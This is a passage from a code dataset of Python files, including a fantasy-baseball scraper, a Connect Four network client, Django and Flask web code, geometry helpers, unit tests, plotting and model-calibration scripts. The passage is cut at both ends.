open('NCB.pickle', 'wb') as handle:\n # pickle.dump(NCB, handle)\n #with open('NCB.pickle', 'rb') as handle:\n # NCB = pickle.load(handle)\n\n with open('NCB.pickle', 'rb') as handle:\n NCB = pickle.load(handle)\n NCB = updateLeague(NCB)\n NCB.createELO()\n NCB.analyizeLastWeek()\n NCB.predictThisWeek()\n # with open('NCB.pickle', 'wb') as handle:\n # pickle.dump(NCB, handle)\n\n\n\n\n \"\"\"\n ELO = NCB.getELO()\n ELO = ELO.sort('ELO', ascending=False)\n print(ELO.loc[:, ['Name', 'ELO']])\n\n with open('NCB.pickle', 'wb') as handle:\n pickle.dump(NCB, handle)\n\n with open('NCB.pickle', 'rb') as handle:\n NCB = pickle.load(handle)\n projections = NCB.projectTeams()\n projections.sort('Zscore', ascending=True, inplace=True)\n print(projections)\n print('\\n\\n\\n')\n with open('NCB.pickle', 'wb') as handle:\n pickle.dump(NCB, handle)\n \"\"\"\n \"\"\"\n NCB = FBB_League.FBB_League('123478', '2015')\n hitters = pd.read_csv('Data/Hitters_projections.csv', index_col=0)\n pitchers = pd.read_csv('Data/Pitchers_projections.csv', index_col=0)\n teams = pd.read_csv('Data/NCB_teams.csv', index_col=0)\n\n NCB.setBatterProjections(hitters)\n NCB.setPitcherProjections(pitchers)\n NCB.setTeams(teams)\n ARB, ARP = scrapeTeamPlayers('123478', '2015', teams)\n NCB.setBatterRosters(ARB)\n NCB.setPitcherRosters(ARP)\n NCB.calculateBatterZScores()\n NCB.calcualtePitcherZScores()\n NCB.getBatterProjections().to_csv('Data/new_Bprojectections.csv')\n NCB.getPitcherProjections().to_csv('Data/new_Pprojectections.csv')\n\n with open('NCB.pickle', 'wb') as handle:\n pickle.dump(NCB, handle)\n\n ARB, ARP = scrapeTeamPlayers('123478', '2015', NCB.getTeams())\n NCB.setBatterRosters(ARB)\n NCB.setPitcherRosters(ARP)\n curHitters, curPitchers = scrapePlayerSeason('123478', '2015')\n NCB.setHitters(curHitters)\n NCB.setPitchers(curPitchers)\n projections = NCB.projectTeams()\n projections.sort('Zscore', ascending=True, inplace=True)\n \"\"\"\n\n\ndef updateLeague(league):\n Scrape = ESPN_Scrape()\n hitters = pd.read_csv('Data/Hitter_projections.csv', index_col=0)\n pitchers = pd.read_csv('Data/Pitcher_projections.csv', index_col=0)\n teams = Scrape.scrapeLeagueTeams(league.getLeagueId(), league.getYear())\n matchups = Scrape.scrapeMatchupResults(league.getLeagueId(), league.getYear())\n ARB, ARP = Scrape.scrapeTeamPlayers(league.getLeagueId(), league.getYear(), teams)\n curHitters, curPitchers = Scrape.scrapePlayerSeason(league.getLeagueId(), league.getYear())\n matchupBatters, matchupPitchers = Scrape.scrapeMatchupPlayers(league.getLeagueId(), league.getYear())\n schedule = Scrape.scrapeLeagueSchedule(league.getLeagueId(), league.getYear())\n weekIds = pd.read_csv('Data/weekId.csv', index_col=0)\n\n week = Scrape.currentWeek()\n\n league.setSchedule(schedule)\n league.setCurrentWeekId(week)\n league.setBatterProjections(hitters)\n league.setPitcherProjections(pitchers)\n league.setTeams(teams)\n league.setBatterRosters(ARB)\n league.setPitcherRosters(ARP)\n league.setBatters(curHitters)\n league.setPitchers(curPitchers)\n league.setMatchUpResults(matchups)\n league.setMatchUpBatters(matchupBatters)\n league.setMatchUpPitchers(matchupPitchers)\n league.setLeagueScheduleDates(weekIds)\n return league\nmain()","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"559616136","text":"import os\n\nfrom ivutils.base import file_ops\nimport jinja2\n\nTHIS_FILE = os.path.normpath(\n os.path.abspath(__file__)\n)\nFILES_ROOT = os.path.dirname(THIS_FILE)\n\nTESTFILE='testfile'\n\npackaged_files = file_ops.MultiRootFilesLocator(roots=[FILES_ROOT])\n\njinja_env = jinja2.Environment(\n loader=jinja2.FileSystemLoader(searchpath=FILES_ROOT)\n)\n","sub_path":"ivutils/files/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"193217987","text":"import connectfour\nimport connectfour_similar\nimport connectfour_sockets\nimport socket\n\n\ndef get_username():\n '''' get username from user'''\n username=\"\"\n username = input(\"Enter username: \").strip()\n return username\n\ndef send_username(connection):\n ''' send username to server protocol and disconnect if username not correct input'''\n response=get_username()\n if \" \" in response or response==\"\":\n print(\"You're not playing by the rules\")\n return\n response = 'I32CFSP_HELLO '+ response\n\n connectfour_sockets.send_message(connection, response)\n response = connectfour_sockets.receive_response(connection)\n if \"WELCOME\" not in response:\n print(\"Not connected to ICS 32 CONNECTFOUR SERVER PROTOCOL\")\n exit()\n return response\n\ndef handle_commands(response,connection,gamestate):\n ''' continues game between user and AI until winner'''\n if response==\"READY\":\n connectfour_similar.player(gamestate)\n user_inp= connectfour_similar.user_input(gamestate)\n send_response = user_inp[0] +\" \"+ str(user_inp[1])\n connectfour_sockets.send_message(connection,send_response)\n gamestate = connectfour_similar.drop_or_pop(gamestate, user_inp)\n response=(connectfour_sockets.receive_response(connection))\n return response,connection,gamestate\n\n if response==\"INVALID\": #Handling Invalid inputs\n gamestate=gamestate\n print(response)\n print(\"ERROR. Try again\")\n response=connectfour_sockets.receive_response(connection)\n return response,connection,gamestate\n\n while (response.strip()!=\"READY\"):\n resp=response[:4].strip()\n if(resp in [\"DROP\", \"POP\"]):\n connectfour_similar.player(gamestate)\n gamestate = connectfour_similar.drop_or_pop(gamestate, response.split())\n connectfour_similar.print_board(gamestate.board)\n return response,connection,gamestate\n\n\ndef connect():\n ''' connects host and port '''\n host = connectfour_sockets.read_host()\n port = connectfour_sockets.read_port()\n try:\n connection = connectfour_sockets.connect(host, port)\n return connection\n except socket.gaierror:\n print(\"TRYING TO CONNECT TO A SERVER WITH INVALID HOSTNAME OR PORT\")\n #exit()\n return\n\ndef winner(response):\n ''' prints winner of the game '''\n if(response==\"WINNER_RED\"):\n print(\"RED IS THE WINNER OF THIS GAME\")\n elif(response==\"WINNER_YELLOW\"):\n print(\"YELLOW IS THE WINNER OF THIS GAME\")\n\ndef userinterface():\n '''main user interface that calls functions '''\n connection=connect()\n if connection is None:\n return\n\n response=send_username(connection)\n if response is None:\n return\n\n print(response)\n connectfour_sockets.send_message(connection,\"AI_GAME\")\n gamestate = connectfour.new_game()\n\n connectfour_similar.print_board(gamestate[0])\n response=connectfour_sockets.receive_response(connection)\n\n while response[:6]!=\"WINNER\":\n output = handle_commands(response,connection,gamestate)\n response = output[0]\n response=(connectfour_sockets.receive_response(connection))\n connection = output[1]\n gamestate = output[2]\n if response[:6]==\"WINNER\":\n winner(response)\n connectfour_sockets.close(connection)\n return\n\n\nif __name__ == '__main__':\n userinterface()\n","sub_path":"lab2-32/connectfour_network_ui.py","file_name":"connectfour_network_ui.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"374618467","text":"#!/usr/bin/env python3\n\n\"\"\"Main.\"\"\"\n\nimport sys\nfrom cpu import *\n\nfilename = './examples/print8.ls8'\nif len(sys.argv) > 1: filename = sys.argv[1]\ncpu = CPU()\n\nif filename is not None:\n cpu.load(filename)\n cpu.run()","sub_path":"ls8/ls8.py","file_name":"ls8.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"397082653","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/9/30 4:49 PM\n# @Author : zhongch4g\n# @Site : \n# @File : 132. Palindrome Partitioning II.py\n# @Software: IntelliJ IDEA\n\n\nimport sys\nclass Solution:\n def minCut(self, s: str) -> int:\n length = len(s)\n if length == 0:\n return 0\n is_palin = [[False] * length for i in range(length)]\n\n for c in range(length - 1):\n # even\n i, j = c, c + 1\n while i >= 0 and j < length and s[i] == s[j]:\n is_palin[i][j] = True\n i -= 1\n j += 1\n\n for o in range(length):\n # odd\n i, j = o, o\n while i >= 0 and j < length and s[i] == s[j]:\n is_palin[i][j] = True\n i -= 1\n j += 1\n\n mincut = [0 for i in range(length + 1)]\n for i in range(1, length + 1):\n mincut[i] = sys.maxsize\n for j in range(i):\n if is_palin[j][i - 1]:\n mincut[i] = min(mincut[i], mincut[j] + 1)\n # Attention: Cut how many times, not how many palindrome\n return mincut[length] - 1\n","sub_path":"LeetCode/132. Palindrome Partitioning II.py","file_name":"132. Palindrome Partitioning II.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"212207489","text":"\"\"\"Enable unit testing of Ansible collections. PYTEST_DONT_REWRITE\"\"\"\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nimport os\n\n# set by ansible-test to a single directory, rather than a list of directories as supported by Ansible itself\nANSIBLE_COLLECTIONS_PATH = os.path.join(os.environ['ANSIBLE_COLLECTIONS_PATH'], 'ansible_collections')\n\n\n# this monkeypatch to _pytest.pathlib.resolve_package_path fixes PEP420 resolution for collections in pytest >= 6.0.0\n# NB: this code should never run under py2\ndef collection_resolve_package_path(path):\n \"\"\"Configure the Python package path so that pytest can find our collections.\"\"\"\n for parent in path.parents:\n if str(parent) == ANSIBLE_COLLECTIONS_PATH:\n return parent\n\n raise Exception('File \"%s\" not found in collection path \"%s\".' % (path, ANSIBLE_COLLECTIONS_PATH))\n\n\n# this monkeypatch to py.path.local.LocalPath.pypkgpath fixes PEP420 resolution for collections in pytest < 6.0.0\ndef collection_pypkgpath(self):\n \"\"\"Configure the Python package path so that pytest can find our collections.\"\"\"\n for parent in self.parts(reverse=True):\n if str(parent) == ANSIBLE_COLLECTIONS_PATH:\n return parent\n\n raise Exception('File \"%s\" not found in collection path \"%s\".' % (self.strpath, ANSIBLE_COLLECTIONS_PATH))\n\n\ndef pytest_configure():\n \"\"\"Configure this pytest plugin.\"\"\"\n try:\n if pytest_configure.executed:\n return\n except AttributeError:\n pytest_configure.executed = True\n\n # noinspection PyProtectedMember\n from ansible.utils.collection_loader._collection_finder import _AnsibleCollectionFinder\n\n # allow unit tests to import code from collections\n\n # noinspection PyProtectedMember\n _AnsibleCollectionFinder(paths=[os.path.dirname(ANSIBLE_COLLECTIONS_PATH)])._install() # pylint: disable=protected-access\n\n try:\n # noinspection PyProtectedMember\n from _pytest import pathlib as _pytest_pathlib\n except ImportError:\n _pytest_pathlib = None\n\n if hasattr(_pytest_pathlib, 'resolve_package_path'):\n _pytest_pathlib.resolve_package_path = collection_resolve_package_path\n else:\n # looks like pytest <= 6.0.0, use the old hack against py.path\n # noinspection PyProtectedMember\n import py._path.local\n\n # force collections unit tests to be loaded with the ansible_collections namespace\n # original idea from https://stackoverflow.com/questions/50174130/how-do-i-pytest-a-project-using-pep-420-namespace-packages/50175552#50175552\n # noinspection PyProtectedMember\n py._path.local.LocalPath.pypkgpath = collection_pypkgpath # pylint: disable=protected-access\n\n\npytest_configure()\n","sub_path":"intro-ansible/venv3/lib/python3.8/site-packages/ansible_test/_data/pytest/plugins/ansible_pytest_collections.py","file_name":"ansible_pytest_collections.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"520227176","text":"from django.conf import settings\nfrom django.urls import include, path\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom django.views import defaults as default_views\n\nurlpatterns = [\n path(r\"\", TemplateView.as_view(template_name=\"pages/home.html\"), name=\"home\"),\n path(r\"about/\", TemplateView.as_view(template_name=\"pages/about.html\"), name=\"about\"),\n # Django Admin, use {% url 'admin:index' %}\n path(settings.ADMIN_URL, admin.site.urls),\n # User management\n path(r\"accounts/\", include(\"allauth.urls\")),\n # Your stuff: custom urls includes go here\n path(r'ckeditor/', include('ckeditor_uploader.urls')),\n\n path(r'blogs/', include(('articles.blogs.urls', 'articles.blogs'), namespace='blogs')),\n] + static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT\n)\n\nif settings.DEBUG:\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n path(r\"400/\", default_views.bad_request, kwargs={\"exception\": Exception(\"Bad Request!\")},),\n path(r\"403/\", default_views.permission_denied, kwargs={\"exception\": Exception(\"Permission Denied\")},),\n path(r\"404/\", default_views.page_not_found, kwargs={\"exception\": Exception(\"Page not Found\")},),\n path(r\"500/\", default_views.server_error),\n ]\n if \"debug_toolbar\" in settings.INSTALLED_APPS:\n import debug_toolbar\n\n urlpatterns = [path(r\"__debug__/\", include(debug_toolbar.urls))] + urlpatterns\n","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"625793919","text":"from __future__ import division\n'''\nContains the most common geometric operations on points, \nsegments and lines. \nPoints are represented as (x,y)\nSegments are represented as (x1,y1,x2,y2)\nLines are represented as (a,b,c), where ax+by+c=0 is the \nequation of the line.\n\nContains the following operations:\n Getting a line from two points\n Getting intersection between pairs of lines or segments\n Getting the closest point on a line or segment to a point\n Getting distance from a point to a point, segment or line\n Finding out if a point is on a segment or not.\n\nTime Complexity: O(1)\nSpace Complexity: O(1)\n'''\n#Returns a line from two points.\ndef two_points_to_line(x1,y1,x2,y2):\n return (y2-y1,x1-x2,x2*y1-y2*x1)\n\n#Returns the intersection between the lines.\n#Assumes the lines have either a or b different from 0.\ndef line_line_intersect(line1,line2):\n a1,b1,c1 = line1\n a2,b2,c2 = line2\n cp = a1*b2 - a2*b1\n if cp!=0:\n return ((b1*c2-b2*c1)/cp,(a2*c1-a1*c2)/cp)\n else:\n if a1*c2==a2*c1 and b1*c2==b2*c1:\n return line1\n return None\n\n#Returns the intersection between two segments.\n#Assumes the segments have length > 0.\n#Return value is None, a point or a segment. \ndef seg_seg_intersect(seg1,seg2):\n line1=two_points_to_line(*seg1)\n line2=two_points_to_line(*seg2)\n p=line_line_intersect(line1,line2)\n if p == None: return None\n if len(p)==2:\n if weak_point_on_seg(seg1,p) and weak_point_on_seg(seg2,p):\n return p\n return None\n pts = [(seg1[0],seg1[1],0), (seg1[2],seg1[3],0), \n (seg2[0],seg2[1],1), (seg2[2],seg2[3],1)]\n pts.sort()\n if pts[1][0] == pts[2][0] and pts[1][1] == pts[2][1]\\\n and pts[1][2] != pts[2][2]:\n return (pts[1][0],pts[1][1])\n if pts[0][2] != pts[1][2]:\n return (pts[1][0],pts[1][1],pts[2][0],pts[2][1])\n return None\n\n#Returns the point on the segment closest to p.\ndef seg_point_project(seg, p):\n line = two_points_to_line(*seg)\n p2 = line_point_project(line,p)\n if weak_point_on_segment(seg,p2):\n return p2\n else:\n if dist(p,(seg[0],seg[1])) < dist(p,(seg[2],seg[3])):\n return (seg[0],seg[1])\n else:\n return (seg[2],seg[3])\n\n#Returns the orthogonal projection of a point onto a line.\ndef line_point_project(line, p):\n a,b,c=line\n x,y=p\n return ((b*(b*x-a*y)-a*c)/(a**2+b**2),\n (a*(-b*x+a*y)-b*c)/(a**2+b**2))\n\n#Returns the euclidean distance between two points.\ndef dist(p1,p2):\n return ((p1[0]-p2[0])**2 + (p1[1]-p2[1])**2)**0.5\n\n#Returns the distance from a point to a segment.\ndef seg_point_dist(seg,p):\n p2 = seg_point_project(seg,p)\n return dist(p,p2)\n\n#Returns the distance from a point to a line.\ndef line_point_dist(line,p):\n p2 = line_point_project(line, p)\n return dist(p,p2)\n\n#Returns if point p is on segment seg.\ndef point_on_seg(seg,p):\n x,y = p\n x1,y1,x2,y2 = seg \n if (x-x1)*(y-y2) == (x-x2)*(y-y1):\n return (x-x1)*(x-x2) <= 0 and (y-y1)*(y-y2) <= 0\n return False\n\n#Only checks that the order of the points is correct.\ndef weak_point_on_seg(seg,p):\n x,y = p\n x1,y1,x2,y2 = seg \n return (x-x1)*(x-x2) <= 0 and (y-y1)*(y-y2) <= 0\n","sub_path":"code/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"452781722","text":"# -*- coding: utf-8 -*-\n\nfrom setuptools import setup\n\n\nwith open('README.rst') as f:\n long_description = f.read()\n\nsetup(\n name='dj-email-url',\n version='0.1.0',\n url='https://github.com/migonzalvar/dj-email-url',\n license='BSD',\n author='Miguel Gonzalez',\n author_email='migonzalvar@gmail.com',\n description='Use an URL to configure email backend settings in your '\n 'Django Application.',\n long_description=long_description,\n py_modules=['dj_email_url'],\n zip_safe=False,\n include_package_data=True,\n platforms='any',\n classifiers=[\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 3',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"124195179","text":"import matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nfrom pylab import mpl\n\n# Shell: `fc-list :lang=zh-cn`\nfont_1 = FontProperties(\n\tfname=\"/System/Library/Fonts/Supplemental/Songti.ttc\",\n\tweight='light', style='normal', size=15)\nfont_2 = FontProperties(\n\tfname=\"/System/Library/Fonts/Supplemental/Courier New Bold.ttf\",\n\tweight='bold', style='normal', size=11)\nfig, ax = plt.subplots()\nmpl.rcParams['axes.unicode_minus'] = False\ntemprature_min = [14, 12, 15, 17, 18, 17, 5, 4, 6, 6, 5, 4, 9, 9, 8]\ntemprature_max = [23, 21, 21, 21, 19, 20, 23,7,12,14,16,17,17,20,17]\ndate_x = list(range(len(temprature_min)))\nplt.ylim([3, 24])\nplt.plot(date_x, temprature_min, label=\"最低温度\", color=\"#1D4E89\", linewidth=2)\nplt.plot(date_x, temprature_max, label=\"最高温度\", color=\"#DB5461\", linewidth=2)\nplt.plot([7, 7], [3, 24], linestyle='--', color='black', linewidth=1)\nplt.annotate(\"今天\", (7, 7), xycoords='data', xytext=(9, 9), arrowprops=dict(arrowstyle='->', connectionstyle=\"angle3\"), FontProperties=font_1)\nplt.xticks(date_x, [f\"11-{x + 1:02d}\" for x in date_x])\nfor tick in ax.get_xticklabels():\n tick.set_rotation(40)\n tick.set_font_properties(font_2)\nfor tick in ax.get_yticklabels():\n\ttick.set_font_properties(font_2)\nplt.text(date_x[-1] + 1, 2, '日期', FontProperties=font_1)\nplt.text(-2, 25, '温度/℃', FontProperties=font_1)\nplt.legend(prop=font_1)\nplt.grid()\nplt.show()","sub_path":"code/Matplotlib/002.py","file_name":"002.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"487291510","text":"import pygame\nimport random\nimport math\n\n\nclass Ball:\n \"\"\"A class to represent the ball.\"\"\"\n def __init__(self, settings, screen):\n self.screen = screen\n self.settings = settings\n\n self.image = pygame.image.load('images/ball.png')\n self.rect = self.image.get_rect()\n\n # Start each ball in the middle of the net\n self.rect.x = self.settings.screen_width / 2 - self.rect.width / 2\n self.rect.y = self.settings.screen_height / 2 - self.rect.width / 2\n\n # Store the ball's exact position.\n self.x = float(self.rect.x)\n self.y = float(self.rect.y)\n\n # Creates random number to use for launch angle\n self.randomnum = random.randint(1, 100) / 100\n self.angle = 360 * self.randomnum\n\n def update(self):\n \"\"\"Move the ball using a random launch angle.\"\"\"\n self.x -= (self.settings.ball_speed * self.settings.ball_directionx * math.cos(self.angle))\n self.y -= (self.settings.ball_speed * self.settings.ball_directiony * math.sin(self.angle))\n self.rect.x = self.x\n self.rect.y = self.y\n\n def blitme(self):\n \"\"\"Draw the ball at it's current location.\"\"\"\n self.screen.blit(self.image, self.rect)\n\n def reflectx(self):\n \"\"\"Reflect the ball's x direction\"\"\"\n self.settings.ball_directionx *= -1\n\n def reflecty(self):\n \"\"\"Reflect the ball's y direction\"\"\"\n self.settings.ball_directiony *= -1\n\n def reset_ball(self):\n \"\"\"Reset the ball back to the middle, make a new launch direction\"\"\"\n self.x = self.settings.screen_width / 2 - self.rect.width / 2\n self.y = self.settings.screen_height / 2 - self.rect.width / 2\n self.randomnum = random.randint(1, 100) / 100\n self.angle = 360 * self.randomnum\n self.settings.ball_speed = .4\n","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"564068578","text":"from autumn.calibration import (\n Calibration,\n run_full_models_for_mcmc as _run_full_models_for_mcmc,\n)\nfrom autumn.tool_kit.utils import find_first_index_reaching_cumulative_sum\n\nfrom ..app import RegionApp\n\nfrom numpy import linspace\n\nN_ITERS = 100000\nN_BURNED = 0\nN_CHAINS = 1\n\n\ndef run_full_models_for_mcmc(region: str, burn_in: int, src_db_path: str, dest_db_path: str):\n \"\"\"\n Run the full baseline model and all scenarios for all accepted MCMC runs in src db.\n \"\"\"\n region_model = RegionApp(region)\n build_model = region_model.build_model\n params = region_model.params\n _run_full_models_for_mcmc(burn_in, src_db_path, dest_db_path, build_model, params)\n\n\ndef run_calibration_chain(\n max_seconds: int,\n run_id: int,\n region: str,\n par_priors,\n target_outputs,\n mode=\"autumn_mcmc\",\n _grid_info=None,\n _multipliers={},\n):\n \"\"\"\n Run a calibration chain for the covid model\n\n num_iters: Maximum number of iterations to run.\n available_time: Maximum time, in seconds, to run the calibration.\n mode is either 'lsm' or 'autumn_mcmc'\n \"\"\"\n print(f\"Preparing to run DR-TB model calibration for region {region}\")\n\n region_model = RegionApp(region)\n build_model = region_model.build_model\n params = region_model.params\n calib = Calibration(\n \"dr_tb_malancha\",\n build_model,\n params,\n par_priors,\n target_outputs,\n _multipliers,\n run_id,\n total_nb_chains=1,\n param_set_name=region,\n )\n print(\"Starting calibration.\")\n calib.run_fitting_algorithm(\n run_mode=mode,\n n_iterations=N_ITERS,\n n_burned=N_BURNED,\n n_chains=N_CHAINS,\n available_time=max_seconds,\n grid_info=_grid_info,\n )\n print(f\"Finished calibration for run {run_id}.\")\n","sub_path":"apps/dr_tb_malancha/calibration/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"641436854","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport unittest\n\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nimport analyzer.shared.text_utility as util\n\n\nclass TestTextUtility(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def test_get_text_eliminated_some_pattern_words(self):\n testcase_sources = [\n (\"@hoge moge\", \"moge\"),\n (\"http://localhost moge\", \"moge\"),\n (\"http://localhost\\nmoge\", \"\\nmoge\"),\n (\"#hoge moge\", \"moge\"),\n (\"#hoge\\nmoge\", \"\\nmoge\"),\n (\"あいうABCDEF1234えお\", \"あいうえお\"),\n (\"あいうABCDEF12えお\", \"あいうえお\"),\n ]\n for source, expected in testcase_sources:\n with self.subTest(source=source, expected=expected):\n eliminated_text = util.get_text_eliminated_some_pattern_words(source)\n self.assertEqual(eliminated_text, expected)\n\n def test_get_nps_printid(self):\n testcase_sources = [\n (\"あいうえお\", []),\n # 10桁の予約番号は除外される\n (\"あいうABCDEF1234えお\", []),\n (\"あいうABCDEF12えお\", [\"ABCDEF12\"]),\n (\"あいうABCDEF12えおABCDEF12\", [\"ABCDEF12\", \"ABCDEF12\"])\n ]\n for source, expected in testcase_sources:\n with self.subTest(source=source, expected=expected):\n nps_id = util.get_nps_printid(source)\n self.assertEqual(nps_id, expected)\n\n def test_get_eliminated_text(self):\n testcase_sources = [\n (\"あいうABCDEF12えお\", \"あいうえお\"),\n (\"あいうえお\", \"あいうえお\")\n ]\n for source, expected in testcase_sources:\n with self.subTest(source=source, expected=expected):\n eliminated_text = util.get_eliminated_text(util.NPS_ID_PATTERN, source)\n self.assertEqual(eliminated_text, expected)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_text_utility.py","file_name":"test_text_utility.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"137428012","text":"import datetime\n\nfrom flask import Blueprint, render_template, session, request, jsonify\n\nfrom App.models import House, Order\nfrom utils import status_code\nfrom utils.middleware import is_login\n\norder_blueprint = Blueprint('order', __name__)\n\n\n@order_blueprint.route('/book_house/', methods=['GET'])\n@is_login\ndef book_house():\n \"\"\"\n 跳转预定页面\n \"\"\"\n return render_template('booking.html')\n\n\n@order_blueprint.route('/orders/', methods=['GET'])\n@is_login\ndef orders():\n \"\"\"\n 跳转下单页面\n \"\"\"\n return render_template('orders.html')\n\n\n@order_blueprint.route('/get_order//', methods=['POST'])\n@is_login\ndef get_order(id):\n \"\"\"\n 提交我的订单\n \"\"\"\n user_id = session['user_id']\n begin_date = datetime.datetime.strptime(request.form.get('start_date'), '%Y-%m-%d')\n end_date = datetime.datetime.strptime(request.form.get('end_date'), '%Y-%m-%d')\n times = end_date - begin_date\n days = times.days + 1\n house = House.query.get(id)\n price = house.price\n amount = days * price\n order = Order()\n order.user_id = user_id\n order.house_id = id\n order.begin_date = begin_date\n order.end_date = end_date\n order.days = days\n order.house_price = price\n order.amount = amount\n order.add_update()\n\n return jsonify(code=status_code.OK)\n\n\n@order_blueprint.route('/my_orders/', methods=['GET'])\n@is_login\ndef my_orders():\n \"\"\"\n 跳转我的订单页面\n \"\"\"\n return render_template('orders.html')\n\n\n@order_blueprint.route('/show_my_orders/', methods=['GET'])\n@is_login\ndef show_my_orders():\n \"\"\"\n 展示我的订单详情\n \"\"\"\n my_orders = Order.query.filter(Order.user_id == session['user_id'])\n orders_info = [my_order.to_dict() for my_order in my_orders]\n return jsonify(code=status_code.OK, orders_info=orders_info)\n\n\n@order_blueprint.route('/custom_orders/', methods=['GET'])\n@is_login\ndef custom_orders():\n \"\"\"\n 跳转客户订单页面\n \"\"\"\n return render_template('custom_orders.html')\n\n\n@order_blueprint.route('/show_custom_orders/', methods=['GET'])\n@is_login\ndef show_custom_orders():\n \"\"\"\n 展示客户订单详情\n \"\"\"\n user_id = session['user_id']\n houses = House.query.filter(House.user_id == user_id)\n houses_ids = [house.id for house in houses]\n custom_orders = Order.query.filter(Order.house_id.in_(houses_ids)).all()\n custom_orders_info = [custom_order.to_dict() for custom_order in custom_orders]\n return jsonify(code=status_code.OK, custom_orders_info=custom_orders_info)\n\n\n@order_blueprint.route('/accept_order/', methods=['PATCH'])\n@is_login\ndef accept_order():\n order_id = request.form.get('order_id')\n\n order = Order.query.get(order_id)\n order.status = 'WAIT_PAYMENT'\n order.add_update()\n return jsonify(code=200)\n\n\n@order_blueprint.route('/refuse_order/', methods=['PATCH'])\n@is_login\ndef refuse_order():\n order_id = request.form.get('order_id')\n\n reject_reason = request.form.get('reject_reason')\n order = Order.query.get(order_id)\n order.status = 'REJECTED'\n order.comment = reject_reason\n order.add_update()\n return jsonify(code=200)","sub_path":"aijia/App/order_views.py","file_name":"order_views.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"282669995","text":"'''\nTask: \nRead two integers and print two lines. The first line should contain integer division, a//b . The second line should contain float division, a/b .\n\nYou don't need to perform any rounding or formatting operations.\n\nInput Format:\nThe first line contains the first integer, a. The second line contains the second integer, b.\n\nOutput Format:\nPrint the two lines as described above.\n\nTask 1. get user input\nTask 2. convert inputs to int\nTask 3. test if conversion is successful\nTask 4. divide and print, twice\n'''\n\ndef divide_two_ways():\n # Task 2\n try:\n # Task 1 and 3\n a = int(input())\n b = int(input())\n # Task 4\n print(a//b)\n print(a/b)\n # python 3 allows float answers by diving two integers. If it didn't, I could convert one of the inputs to a float type to get a float answer on float division. \n except ValueError:\n divide_two_ways()\n\ndivide_two_ways()","sub_path":"hackerrank/03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"264029634","text":"from flask import Flask,render_template,jsonify,request\r\nfrom flask_bootstrap import Bootstrap\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom sqlalchemy import or_\r\n\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI']='sqlite:///E:/PyProject/Spider/info.db'\r\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN']=True\r\nbootstrap = Bootstrap(app)\r\ndb=SQLAlchemy(app)\r\n\r\nclass Info(db.Model):\r\n title=db.Column(db.String(255),nullable=False)\r\n content=db.Column(db.String(255),nullable=True)\r\n time=db.Column(db.String(255),nullable=False)\r\n source=db.Column(db.String(100),nullable=False)\r\n href=db.Column(db.String(255),nullable=False,primary_key=True)\r\n\r\n\r\ndef data_treat(info):\r\n data = [\r\n {\r\n # \"title\": 1,\r\n # \"title\": \"{1}\".format(l.href,l.title),\r\n # \"content\": l.content,\r\n \"title\": \"{1}
